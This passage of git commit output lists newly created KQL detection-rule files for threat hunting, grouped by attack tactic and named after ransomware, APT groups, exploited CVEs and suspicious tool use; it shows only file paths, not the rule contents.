KQL/rules-emerging-threats/Execution/unc2452_process_creation_patterns.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_barracuda_esg_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_email_exfiltration_file_pattern.kql create mode 100644 KQL/rules-emerging-threats/Execution/unc4841_potential_seaspy_execution.kql create mode 100644 KQL/rules-emerging-threats/Execution/ursnif_redirection_of_discovery_commands.kql create mode 100644 
KQL/rules-emerging-threats/Execution/zxshell_malware.kql create mode 100644 KQL/rules-emerging-threats/Exfiltration/shai_hulud_npm_package_malicious_exfiltration_via_curl.kql create mode 100644 KQL/rules-emerging-threats/Impact/funklocker_ransomware_file_creation.kql create mode 100644 KQL/rules-emerging-threats/Impact/lockergoga_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Impact/potential_dtrack_rat_activity.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/commvault_qlogin_argument_injection_authentication_bypass_cve_2025_57791_.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/cve_2024_50623_exploitation_attempt_cleo.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/dns_rce_cve_2020_1350.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/exploited_cve_2020_10189_zoho_manageengine.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql create mode 100644 KQL/rules-emerging-threats/Initial 
Access/potential_exploitation_of_goanywhere_mft_vulnerability.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_file_create.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/potential_sharepoint_toolshell_cve_2025_53770_exploitation_indicators.kql create mode 100644 KQL/rules-emerging-threats/Initial Access/suspicious_crushftp_child_process.kql create mode 100644 KQL/rules-emerging-threats/Lateral Movement/wannacry_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/blue_mockingbird.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql create mode 100644 KQL/rules-emerging-threats/Persistence/commvault_qoperation_path_traversal_webshell_drop_cve_2025_57790_.kql create mode 100644 KQL/rules-emerging-threats/Persistence/cve_2020_1048_exploitation_attempt_suspicious_new_printer_ports_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/cve_2024_1708_screenconnect_path_traversal_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/darkgate_user_created_via_net_exe.kql create mode 100644 KQL/rules-emerging-threats/Persistence/exploiting_setupcomplete_cmd_cve_2019_1378.kql create mode 100644 KQL/rules-emerging-threats/Persistence/kapeka_backdoor_configuration_persistence.kql create mode 100644 KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql create mode 100644 KQL/rules-emerging-threats/Persistence/oceanlotus_registry_activity.kql create mode 100644 KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql create mode 
100644 KQL/rules-emerging-threats/Persistence/potential_bearlpe_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_load.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_coldsteel_rat_windows_user_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_encrypted_registry_blob_related_to_snake_malware.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_kamikakabot_activity_shutdown_schedule_task_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_notepad_cve_2025_49144_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_printnightmare_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_raspberry_robin_registry_set_internet_settings_zonemap.kql create mode 100644 KQL/rules-emerging-threats/Persistence/potential_ursnif_malware_activity_registry.kql create mode 100644 KQL/rules-emerging-threats/Persistence/screenconnect_user_database_modification.kql create mode 100644 KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql create mode 100644 KQL/rules-emerging-threats/Persistence/shai_hulud_malicious_github_workflow_creation.kql create mode 100644 KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql create mode 
100644 KQL/rules-emerging-threats/Persistence/snake_malware_covert_store_registry_key.kql create mode 100644 KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql create mode 100644 KQL/rules-emerging-threats/Persistence/suspicious_printerports_creation_cve_2020_1048_.kql create mode 100644 KQL/rules-emerging-threats/Persistence/suspicious_process_spawned_by_centrestack_portal_apppool.kql create mode 100644 KQL/rules-emerging-threats/Persistence/windows_spooler_service_suspicious_binary_load.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/apt27_emissary_panda_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/commvault_qlogin_with_publicsharinguser_and_guid_password_cve_2025_57788_.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/defrag_deactivation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/exploiting_cve_2019_1388.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_creation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/forest_blizzard_apt_custom_protocol_handler_dll_registry_set.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/injected_browser_process_spawning_rundll32_guloader_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_autorun_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/kapeka_backdoor_persistence_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/leviathan_registry_key_activity.kql 
create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/lummac_stealer_activity_execution_of_more_com_and_vbc_exe.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/non_standard_nsswitch_conf_creation_potential_cve_2025_32463_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/oilrig_apt_registry_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/operation_wocao_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2024_35250_exploitation_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_exploitation_of_crushftp_rce_vulnerability_cve_2025_54309_.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_kamikakabot_activity_winlogon_shell_persistence.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_pikabot_hollowing_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_plugx_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/potential_ryuk_ransomware_activity.kql create mode 100644 KQL/rules-emerging-threats/Privilege 
Escalation/potential_systemnightmare_exploitation_attempt.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/suspicious_vbscript_un2452_pattern.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/taidoor_rat_dll_load.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/turla_group_commands_may_2020.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/winnti_malware_hk_university_campaign.kql create mode 100644 KQL/rules-emerging-threats/Privilege Escalation/winnti_pipemon_characteristics.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/formbook_process_creation.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/mustang_panda_dropper.kql create mode 100644 KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql create mode 100644 KQL/rules-threat-hunting/Collection/clipboard_data_collection_via_pbpaste.kql create mode 100644 KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql create mode 100644 KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql create mode 100644 KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql create mode 100644 KQL/rules-threat-hunting/Command and 
Control/curl_exe_execution_with_custom_useragent.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql create mode 100644 KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_browser_credential_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_chromium_browsers_sensitive_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/access_to_sysvol_policies_share_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql create mode 100644 KQL/rules-threat-hunting/Credential Access/unattend_xml_file_access_attempt.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/access_to_reg_hive_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/access_to_windows_outlook_mail_files_by_uncommon_applications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/ads_zone_identifier_deleted.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql create mode 
100644 KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql create mode 100644 
KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/registry_set_with_crypto_classes_from_the_cryptography_powershell_namespace.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/service_binary_in_user_controlled_folder.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/terminate_linux_process_via_kill.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql create mode 100644 KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql create mode 100644 KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql create mode 100644 KQL/rules-threat-hunting/Discovery/net_exe_execution.kql create mode 100644 KQL/rules-threat-hunting/Discovery/process_discovery.kql create mode 100644 KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql create mode 100644 KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql create mode 100644 KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql create mode 100644 KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql create mode 100644 KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql create mode 100644 KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql create mode 100644 
KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql create mode 100644 KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql create mode 100644 KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql create mode 100644 KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql create mode 100644 KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql create mode 100644 KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql create mode 100644 KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql create mode 100644 KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql create mode 100644 KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql create mode 100644 KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql create mode 100644 KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql create mode 100644 KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql create mode 100644 KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql create mode 100644 KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql create mode 100644 KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql create mode 100644 
KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql create mode 100644 KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql create mode 100644 KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql create mode 100644 KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql create mode 100644 KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql create mode 100644 KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql create mode 100644 KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql create mode 100644 KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql create mode 100644 KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql create mode 100644 KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql create mode 100644 KQL/rules-threat-hunting/Persistence/shell_context_menu_command_tampering.kql create mode 100644 KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql create mode 100644 KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql create mode 100644 KQL/rules-threat-hunting/Resource Development/creation_of_an_executable_by_an_executable.kql create mode 100644 KQL/rules/Collection/7zip_compressing_dump_files.kql create mode 100644 KQL/rules/Collection/attempts_of_kerberos_coercion_via_dns_spn_spoofing.kql create mode 100644 KQL/rules/Collection/audio_capture_via_powershell.kql create mode 100644 
KQL/rules/Collection/audio_capture_via_soundrecorder.kql create mode 100644 KQL/rules/Collection/automated_collection_command_prompt.kql create mode 100644 KQL/rules/Collection/clipboard_collection_with_xclip_tool.kql create mode 100644 KQL/rules/Collection/clipboard_data_collection_via_osascript.kql create mode 100644 KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_7_zip.kql create mode 100644 KQL/rules/Collection/compress_data_and_lock_with_password_for_exfiltration_with_winzip.kql create mode 100644 KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql create mode 100644 KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql create mode 100644 KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql create mode 100644 KQL/rules/Collection/esentutl_steals_browser_information.kql create mode 100644 KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql create mode 100644 KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql create mode 100644 KQL/rules/Collection/gui_input_capture_macos.kql create mode 100644 KQL/rules/Collection/hacktool_adcspwn_execution.kql create mode 100644 KQL/rules/Collection/hacktool_impacket_tools_execution.kql create mode 100644 KQL/rules/Collection/periodic_backup_for_system_registry_hives_enabled.kql create mode 100644 KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql create mode 100644 KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql create mode 100644 KQL/rules/Collection/powershell_get_clipboard_cmdlet_via_cli.kql create mode 100644 KQL/rules/Collection/processes_accessing_the_microphone_and_webcam.kql create mode 100644 KQL/rules/Collection/rar_usage_with_password_and_compression_level.kql create mode 100644 KQL/rules/Collection/recon_information_for_export_with_command_prompt.kql create mode 100644 KQL/rules/Collection/screen_capture_activity_via_psr_exe.kql create mode 100644 
KQL/rules/Collection/screen_capture_macos.kql create mode 100644 KQL/rules/Collection/suspicious_camera_and_microphone_access.kql create mode 100644 KQL/rules/Collection/suspicious_manipulation_of_default_accounts_via_net_exe.kql create mode 100644 KQL/rules/Collection/veeam_backup_database_suspicious_query.kql create mode 100644 KQL/rules/Collection/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_registry.kql create mode 100644 KQL/rules/Collection/windows_recall_feature_enabled_via_reg_exe.kql create mode 100644 KQL/rules/Collection/winrar_compressing_dump_files.kql create mode 100644 KQL/rules/Collection/winrar_execution_in_non_standard_folder.kql create mode 100644 KQL/rules/Command and Control/adsi_cache_file_creation_by_uncommon_tool.kql create mode 100644 KQL/rules/Command and Control/anydesk_temporary_artefact.kql create mode 100644 KQL/rules/Command and Control/arbitrary_file_download_via_gfxdownloadwrapper_exe.kql create mode 100644 KQL/rules/Command and Control/cloudflared_portable_execution.kql create mode 100644 KQL/rules/Command and Control/cloudflared_quick_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/cloudflared_tunnel_connections_cleanup.kql create mode 100644 KQL/rules/Command and Control/cloudflared_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated.kql create mode 100644 KQL/rules/Command and Control/communication_to_localtonet_tunneling_service_initiated_linux.kql create mode 100644 KQL/rules/Command and Control/curl_usage_on_linux.kql create mode 100644 KQL/rules/Command and Control/download_file_to_potentially_suspicious_directory_via_wget.kql create mode 100644 KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql create mode 100644 
KQL/rules/Command and Control/file_download_from_browser_process_via_inline_url.kql create mode 100644 KQL/rules/Command and Control/file_download_from_ip_based_url_via_certoc_exe.kql create mode 100644 KQL/rules/Command and Control/file_download_using_notepad_gup_utility.kql create mode 100644 KQL/rules/Command and Control/file_download_via_certoc_exe.kql create mode 100644 KQL/rules/Command and Control/finger_exe_execution.kql create mode 100644 KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql create mode 100644 KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql create mode 100644 KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql create mode 100644 KQL/rules/Command and Control/hacktool_inveigh_execution_artefacts.kql create mode 100644 KQL/rules/Command and Control/hacktool_remotekrbrelay_smb_relay_secrets_dump_module_indicators.kql create mode 100644 KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql create mode 100644 KQL/rules/Command and Control/hacktool_silenttrinity_stager_dll_load.kql create mode 100644 KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql create mode 100644 KQL/rules/Command and Control/hijack_legit_rdp_session_to_move_laterally.kql create mode 100644 KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql create mode 100644 KQL/rules/Command and Control/installation_of_teamviewer_desktop.kql create mode 100644 KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql create mode 100644 KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql create mode 100644 KQL/rules/Command and Control/mstsc_exe_execution_with_local_rdp_file.kql create mode 100644 KQL/rules/Command and Control/network_communication_initiated_to_file_sharing_domains_from_process_located_in_suspicious_folder.kql create mode 100644 KQL/rules/Command and 
Control/network_communication_initiated_to_portmap_io_domain.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql create mode 100644 KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql create mode 100644 KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql create mode 100644 KQL/rules/Command and Control/outbound_network_connection_initiated_by_script_interpreter.kql create mode 100644 KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql create mode 100644 KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql create mode 100644 KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql create mode 100644 KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql create mode 100644 KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql create mode 100644 KQL/rules/Command and Control/potential_in_memory_download_and_compile_of_payloads.kql create mode 100644 KQL/rules/Command and Control/potential_linux_amazon_ssm_agent_hijacking.kql create mode 100644 KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql create mode 100644 KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql create mode 100644 KQL/rules/Command and Control/potential_wizardupdate_malware_infection.kql create mode 100644 KQL/rules/Command and Control/potential_xcsset_malware_infection.kql create mode 100644 KQL/rules/Command and Control/potentially_suspicious_network_connection_to_notion_api.kql create mode 100644 KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql create mode 100644 KQL/rules/Command and 
Control/printbrm_zip_creation_of_extraction.kql create mode 100644 KQL/rules/Command and Control/pua_3proxy_execution.kql create mode 100644 KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql create mode 100644 KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql create mode 100644 KQL/rules/Command and Control/pua_ngrok_execution.kql create mode 100644 KQL/rules/Command and Control/pua_nimgrab_execution.kql create mode 100644 KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql create mode 100644 KQL/rules/Command and Control/quickassist_execution.kql create mode 100644 KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql create mode 100644 KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql create mode 100644 
KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql create mode 100644 KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql create mode 100644 KQL/rules/Command and Control/remote_file_download_via_desktopimgdownldr_utility.kql create mode 100644 KQL/rules/Command and Control/renamed_cloudflared_exe_execution.kql create mode 100644 KQL/rules/Command and Control/renamed_visual_studio_code_tunnel_execution.kql create mode 100644 KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql create mode 100644 KQL/rules/Command and Control/replace_exe_usage.kql create mode 100644 KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql create mode 100644 KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql create mode 100644 KQL/rules/Command and 